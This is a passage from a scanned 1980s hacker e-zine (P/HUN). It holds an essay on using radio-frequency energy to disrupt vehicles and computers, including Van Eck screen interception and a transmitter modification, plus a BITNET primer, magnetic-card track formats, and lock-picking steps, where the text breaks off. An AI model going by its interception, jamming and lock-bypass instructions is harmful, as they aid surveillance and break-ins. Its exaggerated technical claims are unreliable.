Now, it is reported that most truckers are using and abusing such frequencies and their is little
that can be done to stop such occurances from happening. To add to all of the mess, such
radios have the ability to switch operating frequencies with the touch of a button. In brief, the
10 meter radios can switch to the 11 meter (CB) band with minor modifcations. And back and
forth frequency hopping is as easy as tuning in the average auto radio. One other interesting
aspect of these 10 and 11 meter radios and their use of 10 meter amplifiers, is the problem of
interference generated by the amplifiers due to the lack RF chokes and filters for the simple
reason that the unit is designed for use on the 10, meter band, not the 11 meter band and
thats what the chokes and filters look for, 10 meters, nothing more, nothing less! Enter the
common travelling person with a late model vehicle. Most vehicles today have some form of
directed artifical intelliengence working under the hood. The "brain" controls any number of
common operations ranging from air / fuel mixtures to how and when braking systems will
perform. Microprocessors in todays cars are as common as seatbelts and are now required to
assist in normal operations of said vehicles. And this is where the problem begins. Since the
auto must have such control circuitry to function, then the possible interference of such
operations becomes a real threat. But what sort of threat could be possible with a car, its
control systems and a high powered transmitting radio? Well, if one was to examine the idea
of overriding or shuting down said operations, the car would cease to function in any proper
manner. Such a shutdown could very easily cause fatal accidents and the cause would be un-
known due to all "looking" fine in any aftermath examination. Now we add to the scene, your
common average trucker with such a radio in his poccession and the ability to transmit high
powered signals as one chosses. One example of such high power hijinks would be the specfic
targeting of autos on the highway with a points / scoring system based on performance, price,
make and if the car was built in the U.S. or not. What would be the outcome? To answer, it
would be the shutdown of of the cars electronic logical systems causing other systems on-
board to do likewise in successive order. How can this come about? Well the answer is quite
clear, the high powered signal causes the logical centers to conflict or ignore basic operationalcommands from the microprocessor in turn causing the microprocessor to close down, then
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 37/50
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 38/50
illegal power output. Another incident of the same type of nature was discovered when one of
the helicopters flew to close to a commerical radio stations transmissions towers. Both times
the flight ended in fatalities for the crews. It was discovered that strong radio was the cause.
According to published reports, 5 UH-60 Blackhawks have nosedived into the ground killing 22
serviceman since 1982. And the U.S. Army instructed it's pilots that flights near microwave
antennas or shipboard radar may cause "uncommanded" altitude changes. In English, ittranslates to crashing into the ground at 600 miles per hour! So, this basic simple problem was
not thought of as one that was possible even with the current concerns of systems
management in the now fully electronicisied battlefield. So, the first problem was that the
controls of the craft are being directed by impulses instead of physical controls. The second
was the use of un-protected electronics from both background and now, potential directed
uses of radio frequency energy as weapons of warfare or even better, as stated before limited
urban actions. So now we take the approach of normal radio environment and place an active
thought to possible options no available to a direct force. If reports of these natures are known
to the general public, then what is to stop the directed force from becomming a new invisible
tactic that can cause major disruptions of computer / communications systems currently inuse. Lets take the current state of electronic protective measure in force and used by the
different defense agencies throughout the country. First off, we have the problem of large
Electro-Magnetic Pulses, (EMP's) being able to disrupt command and communications links
with the use of one nuclear device detoneated at a unknown range above the continential
united states. Another example comes from outside theoretical research concerning the SDI
programs. One thought, from Thedore B. Taylor, a retired nuclear weapons designer and
father of the largest yield fission bomb, the S.O.B., was quoted in an interview published in
September, 1987. He stated that if you explode a one-kiloton device in space and directed the
energy into a 3 centimeter beam of radiation, you could deposit enough energy to wipe out
electronic and electrical equipment - computers, antennas, power lines, over an area larger
that Washington, D.C. He was also quoted as saying that microwave weapons are more than
likely being developed too. Now weapons of this nature are on a very large scale and require
vast amounts of energy too start with. But in a directed small beam aimed at normal general
construction type buildings, a directed beam of energy cuts through walls, doors, and windows
as if they were not even there. Your example is some of the local television or radio stations in
your area. If you look at all or most of the stations, you might find a small shack atop of their
building. It may contain the microwave dishes for the studio to transmitter links. The glass and
wood are nothing to the in-comming or out-going signals. Brick walls mean nothing to a radio
signal either. Just tune in your desk radio and listen to your favorite station. So this pulse
would be able to short out almost all commerical electrical, telecommunications, computer
operations, and any other devices that contain transistors or semiconductors for a circuit path.
These basic examples show what such types damage that these emmisionns may pose. The
second part of this problem is with the protection of such circutry. Great amounts of
technology protection comes in the form of deep trenches, standard and special grounding of
buildings and equipment, cable and support runways, and concrete encasements. Now this is
all wonderful and good from a military viewpoint where money is no object, but in the real
world, the use of such protective measures is not possible even for the most prestigieous of
corporations. Now if such large pulses can destroy equipment on a global scale. Then the idea
of using such forces becomes a better local tool for the destruction of security and measures
taken to protect such devices and facilities from a physical standpoint. Ok now we know that
the possibility of directed energy may be used to disrupt the communications and operationsof logical devices. There are numerous ways to use such technology to gather and alter
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 39/50
electronic impulses. Another group of examples comes closer to the common man and is
happening all to frequently to the owner / operators of mass communications systems. Best
know, is the interruption of signals from a Home Box Office satellite and the insertion of a
message that stated its subscripton rate was to high. That one incident struck fear in the
hearts of the communications industry and showed that anything was fair game. Other actions
placed against commerical stations include the interception and signal override of 2 televisionstations in the Chicago area. One such action was placed against a Public Broadcasting station
and the other was directed to one of the "Super Stations" in the same area. The first pirate
transmission lasted 15 seconds and the second, two hours later, lasted 90 seconds. The Pirate,
dressed in a Max Headroom facemask, uttered some statement, although garbled and during
the second incident, bent over and exposed his / her rear and was struck on the behind with a
fly swatter to the shock of the viewers. Of course the FBI and FCC were called in to investigate,
but investigations of this sort led to nothing more than an empty trail. Now to perform such
deeds, one would have to contact either the station or the local office of the FCC to find out
what the transmit and studio to transmitter frequencies are. (And this goes for any transmitter
registered with the FCC. They will supply the name and location, frequency, and the maximumlegal output of such sites.) There are two frequencies used for each television channel. One for
the Audio and the other for the Video, or the other option, to listen or watch the station until
it sign's off for the day (night). This one method does not lead to possible discovery and the
frequencies are given at sign-on and sign-off. A good example of such frequencies is with a
station located in Philadelphia, Pa. The station, WPVI, transmits its audio signal on commerical
FM frequencies. The frequency is 87.8 Mhz. Now anyone with a good transmitter could add
anything to the signal and no one would be the wiser until they did. Examples of such
transmitters and persons capable of doing this type of transmission is best described by the
incident in the summer of 1987 concerning Radio New York. This radio station was considered
a "pirate" station and the federal goverment decided to move in and shut them down. An
interesting note to all of this, was that the station was located on a ship anchored off the coast
of New York outside US boundarys. Still the US goverment with agents of the FBI, FCC,
Customs and the Coast Guard boarded the vessel, closed down the station, arrested the
persons on-board and the ship was taken in tow. End of that particular story. On the other
hand, two other stories of interest deal with the possible and real way some may be able to
jam or possibly damage state of the art satellite communications. The first dealt with a group
who call themselves the American Technocratic Association based in Wilmington, Delaware.
This groups thought revolve around the scrambeling issue in use by the pay TV companies. The
background of the members of this group claim to have a good working knowwledge of
military radar communications systems. The group claims to have the capability to jam a
satellite with a few mobile systems it has. One operation that the group hopes to undertake
was called "Operation Sunspot". The group claims to have areas mapped out that have no
treaty, regulation or statute dealing with the jamming of a geo-stationary satellite. The one
problem with all of this is that such a thing could happen very easily. Now there are some who
say that such things could not happen, but if one is to look in a number of magazines for such
information on frequencies or locations, you could find it. So you say to yourself that you want
to try this experiment. Well we will not supply exact details of such techniques, but will say
that HAM radio operators have the ability to contact both American and Soviet repeater
satellites and if you wanted to you could do the same thing. Now for your basic uplink to such
systems, you would need a transmit dish and the power behind the signal. So for a ten foot
dish, you would need 91 watts, a six foot dish, 280 watts. It may not be dirt cheap to generatehigh powered signals in the mid range of 1-10 Ghz, but it does not present a great techincal
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 40/50
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 41/50
form. The encryption is all wonderful and good for the transmission and storage, but does
nothing for the information as it is in its final stage to the human eyes! And you only have two
ways to get it to the eyes, in hard copy or by a video screen. Now you think that interception is
not possible since the information is encrypted, but the data must be decrypted so that the
human connection may use the information. The human connection allows for the reception
of said information by the afore mentioned devices and lets interception to happen throughthe clear or decryption points of the attacked devices. And one other point to mention; other
possible effects of reception / transmission to security in general, could affect other controls
ranging from building energy management to security access and monitoring controls. To give
a better understanding of such equipment, we will discuss some of the devices known. One
such device known as the Van Eck device and the other is called the Re-Process Sync Amplifier.
Some may feel that there are two different systems involved in this discussion, but the author
finds no major difference between the two, with the exception of the Van Eck device is built
for operation on European voltages and has a built-in digital frequency meter. The one major
difference found is with the dates of copyrights for the two devices. The Don Britton device is
dated 1979, while the Van Eck unit is dated October,1985. Note: Another unit, with plans forsuch devices, are available from Consumertronics, located in Alamorgordo, New Mexico.
Besides the plans for a Van Eck type reader, one book offers information in reference to
computer crime and countermeasures, how systems are penetrated, BBS advice, Password
defeats, TEMPEST, crosstalk amplifiers and a 200 word phreaking terms glossary. All for only
$15.00 We will begin with a basic understanding of the inner workings of the device. The one
other major basic difference with the two reader boxes is that the Van Eck box is designed for
use with tv's and VDT's used in Europe as compared with the Britton box built for use in the
United States. This device in general, is designed to restore and regenerate the sync and
colorburst signals and ignores all information appearing during either the vertical or horizontal
blanking. Its basic result is reconfigure through the use of supplying artifical external signals
inputed directly to any video monitor through a simple 10-50 dollar modification of the TV or
video monitor, or in simple english, takes a weak video signal and tries to shape or match it
and then boost its output to a normal television screen. One other interesting thought comes
to mind with the use of video tape copy protection methods. Since these methods use a
means that makes it tough on the VCR not the TV from generating signals for tape duplication,
there have been a number of devices that assist in the retoring and re-structure of the picture
and sound. One device is known as the "Line Zapper". The device helps to adjust the brightness
changes, vertical jumping and jittering, and video noise. It is available in kit or complete form.
Pricing starts at $69.95 and complete tested units cost $124.95. Now if this unit can assist in
the filtering and structuring of commerically induced weak signals, then it should be able to
take a boosted signal presented to it and clean the picture to something of useable form.
Some may see this only as a filter for video processing with a focal point on the actual copy-
guard techniques, but such a device incorporated into the Van Eck type of gear should assist in
the overall signal restructuring. Now one other interesting point about possible video signaling
re-construction methods was addressed in a multi-part series published in Radio-Electronics
based on the methodology used for the construction of video signals scrambeled by different
vendors of cable and over-the air pay television. The series dealt with all aspects and methods
of video and audio, (complete with discussions on the DES methods used for the VideoCipher
units and the like,) used in commerical systems in use. One other thought comes to mind of an
experimental nature. Since the screen of a computer is not always changing and for the most
part stable in its display, why not take the recieved signal and digitize it! You could filter outsignal noise clean up any true video signal present. This is no great techno-wonder, the basic
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 42/50
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 43/50
nothing more than a shortwave reciever with excellent signal reception and frequency stability
that offers far better overall signal interception quality. The unit offers 1 Hz tuning and has
digital frequency readout. As an option, this unit may be controlled by an IBM or compatable
PC. Cost for this unit is $949.00 b. Unit 2 (R7000) covers 30 Mhz to 2 Ghz. This unit is a general
coverage reciever with excellent signal reception and frequency stability that offers far better
overall signal tuning and interception quality. Also this unit can be computer controlledthrough an IBM or compatiable. The unit offers .01 Hz tuning and has digital frequency
readout. Additional abilities of the unit include signal output and a IF output of 10.7 Mhz with
other frequencies available. The cost for the unit is $1099.99. This particular unit also has an
option for the output of the video signal and connection of any standard video monitor for 130
dollars. For an additional 160 dollars the unit can have the ability to recieve signals from 20 Khz
and go all the way to the specified 2 Ghz. The unit needed is called a Kuranishi FC-7000
frequency converter. With additional commerical television MDS tuning equipment, ranges
can exceed 2.7 Ghz. Costs for this will range between 79 and 109 dollars. Since we will be
mostly dealing in the lower ranges of frequencies, an added piece of gear may be used to gain
the best signal reception points available. This is through the use a Radio Direction Finderavailable from American Electronics for 100 dollars. Now with all this equipment for both
systems, another basic system with minumum cost is readilly available to many for under
100.00 dollars. This we speak,of is the common Black & White Television set available in mass
quanties from any number of sources. It has been reported that such interception capabilities
are possible and have occured without the interceptee knowing until the Communications
Commission have contacted the source of the emmited signals. For example, some personal
computers and their respective screen have been known to been picked up on the TV screens
of their neighbors and through nothing more than rough or fine tuning the reception. The
reason is due to the TV having the ability to automatically adjust the Sync signals to those close
to the frequency of intercepted computer screens sync frequency. This "ability" is available
through the use of a common manual type tuner on a standard Black & White set with a
normal directional antenna and an standard antenna amplifier. All three devices in common
life and attached to your own television recievers! You have such devices if you have an
antenna on your roof or attached to your set. Most have attached signal amplification due to
the ever growing background noise generated by normal commerical stations and reception
charictersistic In simple term, the guy next door can read your screen and you don't know it.
Now take the number of personal type computers in a standard corporate environment,
caulculate the possible dollar figures of the combined information contained in these
machines, and substantial sums become more evident than ever before. If business plans,
formulas or patent-trade information, client lists, or any other type of valuable information
and since that information will be called up at any time or current work performed is wanted
in the surveillance gathering operation and then you have a completely wide open way of
monitoring the daily practices and transactional actions with complete impunity and securty of
such areas is completely unguarded due to the lack of knowledge. For experimental purposes,
we will use very simplistic computer systems to give an idea of what may be possible. The
equipment shall be basic, over the counter, cheap, electronic systems to gather and produce
the signals we which to collect. The equipment list is as follows: 1. Franklin Ace 1200 (Apple II
compatiable) a. Franklin Ace Serial / Paralell Card (Paralell card is in use for the 2 printers.) b.
Apple Super Serial Card (RS-232) for use with the communications modem. 2. Franklin Video
Monitor (40 or 80 characters display) 18 Mhz ( Standard IBM monitors radiate at 15 to 16 Mhz
) 3. Prometheus ProModem 1200 (External type) 4. Printers a. Okidata Microline 92 b. EpsonMX-80 Our basic reception / interception equipment consists of: 1. Bearcat 250 (50 Channel)
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 44/50
Scanner (Coverage from 32-50,146-148,148-174,420-450,450-470,470-512 Mhz) 2. Soundesign
FM Stereo Tuner (86.5 Mhz to 109.5 Mhz) 3. Electrobrand AM-FM-SW-CB-TV-PB-AIR-Weather
The AM and FM are standard commerical band recievers. SW is short-wave from 4 Mhz to 12
Mhz TV coverage is from audio channels 2 through 13 AIR band from 108 through 135 Mhz
Public Band is 145 through 175 Mhz 4. A Gould OS 1100 A Osocilliscope 25 Mhz range Since we
will not try to re-construct the actual video signal generated, as this has already been done, wewill not have to explain what we recieve as a picture. What we will cover is the gross signal
output of standard population computerized logical systems. In our observations, we have
seen a wide spectrum of emmitted signals with a strong signal between 9.0 and 9.250 Mhz for
the display of standard text scrolling by. Better signal display was found at the lower
frequencies of 9 Mhz. Monitor frequencies were found in the area of 11 through 19.5 - 20
Mhz. Printer frequencies are in the range of 140 to 200 Mhz. Disk operations were detected in
the ranges of 88 to 250 Mhz. Overall frequency generation was from 4 through 500 Mhz. The
modem was found between 28 and 300 Mhz. All in all, this easy discovery of radiated or
transmitted signals by means of common radio technology could lead to. An interesting
thought comes up with the use of some common ham transcievers for such operations, andwith simple, easy modifications, some can transmit on all frequencies from 1.6 t 30 Mhz. Such
a transmitter would be the Kenwood 440. This transciever offers 100 watt output and as
stated all frequency transmit. To perform the small modification, all one would have to do is
cut one lead to a diode (Diode D 80) and as an added bonus for better frequency readout, you
gain an additional readout of 10 Hz by snipping the lead to Diode 66. So the unit covers the
range of IBM PC frequencys in use and all of the Apple systems too. Thats says it all! It can
offer the possibility for disruption of internal signals used to process information and the
possibility of causing other logic related systems to act or not without reason. For example,
would it be possible for the Soviets to sit under cover with a modified Kenwood 440 100 watt
radio or better yet, a Radio Shack 40 channel AM / SSB and a 100 watt Firebird linear amplifier
and a simple small antenna to disperse the signal. So the problem of the 6 million dollar
helicopter comes down to a wholesale cost of 150.00 ( 190.00 to 200.00 for an average rip-
stop nylon camping backpack unit ) per man with a recommended dispersal of 3 manpacks per
unit into the theater. Suspected effective ranging up to 3 miles per man pack unit is suggested.
Or even better, if such things were possible against military aircraft or normal commerical real
world autos, then directed intent should be of now problem against civilian targets such as
computer installations, bank and operations support structures, possible override of security
systems and any other systems that may be affected by such forces. Other uses of directed
energy may be used in law enforcement situations for the apperhension of suspected persons
in late model automobiles. If the truckers are using the radios for game playing, then why can't
the police have the same type of device for the stopping of autos? There are a number of
devices that will radiate such energies over the spectrum. One such device would be the Radar
Speed Gun Calibrator (or better know as a radar jammer) for use with calibration of speed
guns or for the deceiving of police radar units. The plans for such units were (are) available for
a number of sources. One such source, is Philips Instrument Company or another such source
was the Radio-Electronics issue in the spring or summer of 1987 with plans for the Radar
Speed Gun Calibrator, that would allow you to transmit a signal that would equal the same
type of reflected signal from an automobile traveling at the supposed testing speed. Range's of
speed signal output would equal 5 mph to well over 100 mph. Some plans or kits come with
instructions for the combination of radar jammer units with most commonly available auto
radar detector units. In simple terms, the radar detector unit detects a signal and through itsdisplay or attention getting circuitry in turn activates the radar jamming equipment to deceive
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 45/50
or jam the police transmitter / reciever units. Best know of such combinations, were the use of
Escort radar detectors and jammer units with transmission horns mounted behind the front
grill of autos. No ifs, ands, or buts, they work! One other piece of equipment that may have
devastating effects on overall security and support systems, deals with the generation of very
high energy pulses that might be classified as being able to generate EMP's that could damage
almost any piece of electronic gear. The claim from the designer is that this device cangenerate a pulse with an effective range of multi-millions of watts. The device on average will
produce a pulse equal to 400,00 wats in a testing mode with the multi-million outputs
available with full charging of the capacitor banks peaked. Also stated in this book is the ability
of the unit to produce a very large inductance in near by electronic gear. Most interesting! And
the only statement in this book about the device and it's short comming, has to deal with the
in-ability of the device to produce sufficent output used in certain nuclear experiments. I
wonder what that means? So, in closing, the capability of these units is well within the range of
any person with the intent comes closer to home than ever before. The equipment is nothing
of major technical wonderment, just a few simple block circuits put together to each other so
that they work together to do the final requested product. And all of the described gear orplans may be in the hands of everyday persons even if they don't know it! And while most do
not have such knowledge about how such systems may be used to corrupt other systems, or
even how the average telephone or toaster may work, they will still state that such described
technology is not possible, and open the door to major disaster due to complete ignorance to
the problem. In closing, to steal a phrase from someone else, "The truth shall set you free (or
may keep you from being over exposed from free form energy)! "Click!" And the last words
spoken by the corporate DP offical were... " Thats impossible! You could never do that to my
operation!" Ahem, Sure sir, Sure! =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-= = P/HUN Issue #3, Volume 2: Phile #9 of 11 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= An introduction to BITNET -------------------------
By Aristotle Jan 17, 1989 About BITNET: Because It's Time NET (BITNET) is the largest of the
acedemic computer networks and one of the largest mainframe networks. BITNET connects
hundreds of thousands of students and professors in Asia, Europe, Middle East, and North
America. In 1988, BITNET had nearly 2000 computer systems at higher institutions connected
to it. BITNET may not allow you to log onto mainframes, BUT it IS an invaluable source of
information. While on BITNET, you can access certain services such as chat relays, file servers,
electronic mail service, and info servers. (See below for more info) A little semi-technical info:
The mainframes on BITNET are connected via constantly operating telephone lines or satellite
links. Unlike packet-switching networks (ie. Telenet), BITNET is a store and forward network.
That means that if you send a message from Florida to Kentucky, the computers in the
network between Florida and Kentucky will store and forward it from each computer to
computer until it reaches Kentucky. In BITNET there's only one path from Kentucky to Florida.
Each computer is called a NODE. Below is an illustration of how a small section of the network
would look like. A----B----C | | | D----E----F----G | | | H I----J ---K Example A. A message traveling
from A to H would travel the following path: A-D-H Example B. A message traveling from A to F
could travel one of two ways. These are: A-B-C-F or A-D-E-F Sometimes when a node is down,
the message may be delayed or routed through different nodes as in example B. The time to
transfer messages can vary from just a few seconds to an hour. This cause for this is usually
one (or both) of two reasons. The first factor is the size of the message. Larger amounts of data
take longer times to transmit. The second factor is the status of the network. As we all know,
computers are prone to breaking down. Messages that cannot be routed past the downednode are stored in the net until there is a clear path to it's destination. Addresses: Each of the
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 46/50
mainframes(NODE) on BITNET has it's own individual address. The addresses are usually an
abbreviation of the name of the institution that supports the mainframe. One example is the
University of Massachusettes "UMASS". The indiviuals that have access to BITNET also have
their own addresses. These addresses are assigned to the user when he/she first sends
information over BITNET. The entire address for a user is set up as follows: University of
Kentucky Prime--+ | @ (AT)----------------------+ | | | User ID-------------------+ | | | | | | | | | | | || | | | | $108@UKPR Note: Not all addresses give indication of the type of system. Also: On
some machines, the BITNET ID will be different from the system ID. Ex.
CS.DEPT.SMITH.J@UKPR is also $108@UKPR. Access: It is IMPOSSIBLE to access BITNET unless
you can gain access to one of the nodes. That means, there are NO dial-ups that do not go
through a mainframe. BITNET is supported by the institutions that have access to it and it is
your right as a student to have access. It is NOT your right to access the mainframe though. A
good way to gain access to BITNET is to go to your local university and ask or engineer an
account for the use of BITNET. Uses: There are three basic methods of communicating via
BITNET: mail, message, and file. Each method has it's own advantages and disadvantages. The
interactive message (Let's just call it a message) is the fastest and most convenient method oftransitting short amounts of information over BITNET. Messages are composed of one line of
information that is sent VERY quickly to it's destination. You would use the message when
chatting with someone at a different node. The bad part about messages is that if a node is
down, your message is lost. You WILL recieve an error message though. Messages are usually
sent via the TELL and SEND commands. Below are examples of the syntax for sending a
message on the VM/CMS and Prime systems: TELL userid@node message or TELL
151133@DOLUNI1 Hey Terra, How are the guys at CCC doing? Mail: Electronic mail is the most
versatile method of communication on BITNET. Unlike the message, a letter will be stored if a
node is down. A letter can be from one word of text to however long you want it. It has been
suggested to me to NOT transmit any mail over 3000 lines long (hmmm, maybe we should
explore that one.) The actual file that is transmitted is really nothing more than a formatted
text file with a header. When you send mail from you system, You will be prompted to input a
subject so the header can include the sending address, recieving address, date, and subject. A
piece of mail would look like this: Date: Fri, 13 Jan 89 18:26:12 EDT From: Terra
<151133@DOLUNI1> Subject: Greetings To: $108@UKPR +
============================================================= + Hello Aristotle | |
Regarding the information that I have been recieving | directed to a member of the | Chaos
Computer Club....... rest of text Files: The file is the best way to send large amounts of
information over BITNET. As with mail, files are stored until you read them or in the case of
node being down, until they are back up. Any type of file can be sent via a file. They can be
either text or binary. On a VM/CMS system, one would use the SHIP command to send a file
over BITNET. Below is an example: SHIP filename filetype userid@node or SHIP phun3 txt
$108@UKPR I suggest that you check your online help for information on sending info over
BITNET. Now for the phun part.... FILE SERVERS, CHAT RELAYS, AND SERVICES: Servers are
machines set up as automated databases for the distribution of various information. Servers
respond to commands via mail or message. Not all use accept this type of communication. It all
depends on the type of software the server is running. One would send a message to a server
in the following syntax: TELL userid@node command or Tell listserve@bitnic help File servers
are like servers but they are set up as databases that transmit files. They are kinda like BBS's.
The best way to get started with a file server is to send it the help command. A good place to
start is the Listserv@Bitnic system. It will send you all the information you will need to getstarted. Name servers have two functions. The first is to locate a person's address on BITNET
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 47/50
and the second is to help you find people on BITNET with similar interests. (Hmmm, a hacker
directory?) I suggest starting with the name server at Drew University. To find a particular
person, just send the following to Drew: TELL NAMESERV@DREW SEARCH/NAME john doe If
the person you are looking for is not registered, you will recieve a message informing you of
that. To register yourself, send the following to Drew: TELL NAMESERV@DREW REGISTER first
last interests or TELL NAMESERV@DREW REGISTER John Doe LMOS hacking A chat relay is setup to allow many users to chat with each other without having everyone sending messages to
each other individually. When on a relay, the people on your channel (be it public or private)
will all see the messages that you send to them. This is GREAT for phreaker conferences
(Though it is NOT secure due to system operators) and just chatting with your friends over
LONG distances. Geee and it is all legal too! To find out more about relays, just send the
following: TELL RELAY@UTCVM help If your local relay is not UTCVM, you will receive a
message tell you that and also your correct relay. Well, that's it for this file. If you have any
questions about BITNET, you can contact me at the following boards: Hacker's Den 718-358-
9209 The Outlet Private 313-261-6141 Newuser/Kenwood =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = P/HUN Issue #3, Volume 2: Phile #10 of 11 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= PLASTIC CARD
ENCODING PRACTICES AND STANDARDS --------------------------------------------- By Hasan Ali For
P/HUN Issue #3 GENERAL PHYSICAL CHARACTERISTICS -------------------------------- If you take any
plastic card (MasterCard, VISA, AMEX, ATM cards, etc.) and turn it over you will find a thin
black strip of magnetic material. This strip has the ability to hold multiple "tracks" or bands of
encoded data. There are 3 valid tracks. Track 1 is the track nearest to the top of the card, and it
is followed by Tracks 2 and 3. The original specifications allowed for Tracks 1 and 2 only, and
they are both read-only. The additional Track 3 furnishes an ability to read OR write. TRACK 1
The International Airlines Transport Association originated the development of Track 1 as the
official track airline use and, in fact, it defined the data and encoding formats for the ANSI
standard. This track was originally designed to allow the use of customer-operated ticket
dispensing machines to cut down the traffic at airport ticket counters. Now, many other
parties make use of Track 1 because it is the only encoded track that permits encoding of the
card holder's name. With this alphanumeric capacity, the card holder's name can be printed on
an EFT terminal receipt rather cheaply, otherwise the name would have to be sent the
computer, which would be more costly and would take more time. There are 26 formats for
Track 1, and they are designated by codes from "A" to "Z". Format "B" is shown below. Field
Name Length(chars) Start sentinel 1 Format code = "B" 1 (alpha only) Primary account number
Up to 19 Separator (SEP) 1 Country code 3 Name 2 to 26 Surname Surname SEP = "/" First
name or initial Space (when required) Middle name or initial Period (when followed by title)
Title (when used) SEP 1 Expiration date or SEP 4 or 1 Discretionary data balance up to
maximum track length End sentinel 1 Longitudinal Redundancy Check (LRC) 1 MAXIMUM
TRACK LENGTH 79 Format code "A" is reserved for proprietary use by the card issuer. Format
codes "C" through "M" are reserved by ANSI for use in other data formats of Track 1. Format
codes "N" through "Z" are available for use by individual card issuers. TRACK 2 The American
Bankers Association led to the development of Track 2 on behalf of two credit card companies
(Interbank and VISA) and their members. The intent was to have a standardized plastic card
which could be used at point- of-sale (POS) terminals to obtain authorization for credit card
transactions. Today, in the financial industry, Track 2 is the most widely used encoding method
for plastic cards. It has a strong following because most EFT terminals are connected directly to
a computer that accesses the cardholder's data files. Also, it is the preferred choice of the ABAand is the only track recognized and supported by MasterCard and VISA. The format of Track 2
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 48/50
8/17/2019 HACKER'S DEN BBS PAPER WORK GREAT CYBERPUNK.pdf
http://slidepdf.com/reader/full/hackers-den-bbs-paper-work-great-cyberpunkpdf 49/50
enough practice can learn to do a decient job. A good book on the subject comes from
HPC(again)(Basic Picking and Raking. This runs around $15.00), this is a bit overpriced, but a
good guide. But, let's go on...... Hand picks: ----------- There are 4 different types of picks The
rake The hook(this has other names as well) The diamond The ball/double ball(2 balls stacked)
The rake: --------- The rake is prehaps the easiest tool to use, but it does not teach you much
about the lock you are working on;if this does not matter to you, then don't worry about it.Hold the cylinder or padlock in a upright position(the way it normally be mounted). The pins
should be on the top. Hold the pick with the more prominent wiggly side up(the hollow side
down). Tilt the back of the handle downward a bit;the wiggly part should be horizontal. Now
put it down for a minute, and pick up a tension wrench(L shaped piece), and insert the shorter
bent end into the bottom of the keyway. Now.. Rotate the wrench in the direction that the
lock normally rotates to open-if not sure-pick a direction. Then..hold the pick so that the
handle is angled towards you slightly;at this angle the curved part should be horizontal. Insert
the pick into the lock all of the way into the keyway, and making sure that contact is attained
with the pins. Draw it out..repeat until lock is open. But..don't push the pins up by forcing the
pick upward with great force...not only will this not open the lock, but you will bend the pick aswell. If it does not open: First, release the tension(you should hear the pins drop). 1.Try less(or
more)tension on the tension wrench(NOTE:most problems are caused by too much tension).
2.Try holding the pick at a slightly different angle and/or height. 3.Try picking the lock in the
other direction. The hook: --------- The hook is used to lift individual pins in a cylinder. The
tension wrench is inserted and rotated the same way as above. After putting tension on the
wrench, insert the hook into the keyway with the hook upward. Then, starting from the
rearmost pins, lift each pin. To do this:Lift the pin until you feel a bump, or a "click", or a
change in the spring action of the pin then STOP and go to the next pin. Continue this until the
lock opens. If it does not open release the tension then: 1.Try with more or less
tension(NOTE:usually the problem is too much tension, so try lowering it first). 2.Try starting
from the front pins, instead of the back ones. 3.Try picking the lock in the other direction. The
diamond: ------------ This tool is used the same way as the rake, as it is a modified rake design,
although it does not look the same. The ball/double ball: --------------------- These tools are
mainly used for picking wafer tumbler locks. They are used the same way as the rake, except
these locks open *so* easily, that you probably won't have to worry about the lock not
opening. NOTE:these locks can often be open in a pinch by using a bent paper clip(rake the
wafers and rotate the clip at the same time) PICK GUNS: ---------- The most difficult part about
using a pick gun is not using it, but getting the damm thing in the first place. They are available
from most of the same places that hand picks are sold, but unlike hand picks, are not readily
made at home. If you manage to get one(the best one, at least in my opinion, is the LOCKAID.
This pick is made by a company called majestic. It is made very well, has an ajustable strike
force dial, and has a LIFETIME warranty! Well, let's assume you have one of these tools... Well
the first thing is to get a lock(a small padlock is a good practice item) then... 1.insert the
tension wrench at the bottom of the keyway, and rotate it in the direction that the lock opens.
2.starting with the pick gun's tension dial set either to 0 or 1(0=the point that the dial will go
no lower)(1=1 full turn in the opposite direction), take the pick gun and insert it's needle into
the keyway, but try not to insert it beyond the pins, as the needle may bind. Holding the tool
horizontal, squeeze the trigger. Do this 6-8 times, if no results then release the tension(on the
cylinder), raise the pick gun's tension dial 1 full turn, and try to open the lock again. Keep trying
until you get it open. TUBULAR LOCK PICKS: ------------------- The best guide to using a tubular
